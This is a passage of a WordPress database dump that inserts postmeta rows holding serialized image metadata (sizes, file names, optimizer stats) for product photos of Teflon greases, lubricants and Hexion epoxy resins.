ease-t-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"teflon-heavy-equipment-grease-t-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15073, 1452, '_wp_attached_file', '2016/09/teflon-high-temp-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15074, 1452, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:35:"2016/09/teflon-high-temp-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"teflon-high-temp-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"teflon-high-temp-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"teflon-high-temp-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"teflon-high-temp-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"teflon-high-temp-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"teflon-high-temp-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"teflon-high-temp-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"teflon-high-temp-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15075, 1453, '_wp_attached_file', '2016/09/teflon-high-temp-grease-t.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15076, 1453, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:37:"2016/09/teflon-high-temp-grease-t.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"teflon-high-temp-grease-t-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"teflon-high-temp-grease-t-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"teflon-high-temp-grease-t-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:39:"teflon-high-temp-grease-t-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"teflon-high-temp-grease-t-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"teflon-high-temp-grease-t-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"teflon-high-temp-grease-t-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"teflon-high-temp-grease-t-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15077, 1454, '_wp_attached_file', '2016/09/teflon-marine-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15078, 1454, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/teflon-marine-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"teflon-marine-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"teflon-marine-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"teflon-marine-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"teflon-marine-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"teflon-marine-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"teflon-marine-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"teflon-marine-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"teflon-marine-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15079, 1455, '_wp_attached_file', '2016/09/teflon-multi-use-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15080, 1455, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:38:"2016/09/teflon-multi-use-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"teflon-multi-use-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"teflon-multi-use-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"teflon-multi-use-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"teflon-multi-use-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"teflon-multi-use-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"teflon-multi-use-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"teflon-multi-use-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"teflon-multi-use-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15081, 1456, '_wp_attached_file', '2016/09/teflon-multi-use-quart.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15082, 1456, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/09/teflon-multi-use-quart.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"teflon-multi-use-quart-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"teflon-multi-use-quart-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"teflon-multi-use-quart-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"teflon-multi-use-quart-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"teflon-multi-use-quart-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"teflon-multi-use-quart-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"teflon-multi-use-quart-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"teflon-multi-use-quart-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15083, 1457, '_wp_attached_file', '2016/09/teflon-severe-service-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15084, 1457, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:40:"2016/09/teflon-severe-service-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"teflon-severe-service-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"teflon-severe-service-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"teflon-severe-service-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"teflon-severe-service-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"teflon-severe-service-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"teflon-severe-service-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"teflon-severe-service-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"teflon-severe-service-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15085, 1458, '_wp_attached_file', '2016/09/teflon-silicone-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15086, 1458, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:37:"2016/09/teflon-silicone-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"teflon-silicone-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"teflon-silicone-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"teflon-silicone-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:39:"teflon-silicone-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"teflon-silicone-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"teflon-silicone-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"teflon-silicone-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"teflon-silicone-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15087, 1459, '_wp_attached_file', '2016/09/teflon-white-lithium-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15088, 1459, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/teflon-white-lithium-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"teflon-white-lithium-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"teflon-white-lithium-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"teflon-white-lithium-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"teflon-white-lithium-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"teflon-white-lithium-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"teflon-white-lithium-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"teflon-white-lithium-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15089, 1460, '_wp_attached_file', '2016/09/teflon-white-lithium-grease-c.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15090, 1460, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:41:"2016/09/teflon-white-lithium-grease-c.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-c-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-c-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-c-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:43:"teflon-white-lithium-grease-c-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-c-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-c-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-c-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-c-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15091, 1461, '_wp_attached_file', '2016/09/teflon-white-lithium-grease-t.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15092, 1461, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:41:"2016/09/teflon-white-lithium-grease-t.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-t-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-t-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-t-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:43:"teflon-white-lithium-grease-t-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-t-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-t-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-t-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:41:"teflon-white-lithium-grease-t-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15093, 1462, '_wp_attached_file', '2016/09/hexion-epikure-3140-curing-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15094, 1462, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:44:"2016/09/hexion-epikure-3140-curing-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:44:"hexion-epikure-3140-curing-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:44:"hexion-epikure-3140-curing-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:44:"hexion-epikure-3140-curing-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:46:"hexion-epikure-3140-curing-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"hexion-epikure-3140-curing-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"hexion-epikure-3140-curing-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"hexion-epikure-3140-curing-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:44:"hexion-epikure-3140-curing-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15095, 1463, '_wp_attached_file', '2016/09/hexion-epon-resin-826.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15096, 1463, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:33:"2016/09/hexion-epon-resin-826.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-826-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"hexion-epon-resin-826-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"hexion-epon-resin-826-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"hexion-epon-resin-826-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-826-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-826-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"hexion-epon-resin-826-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"hexion-epon-resin-826-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15097, 1464, '_wp_attached_file', '2016/09/hexion-epon-resin-828.jpg'); 
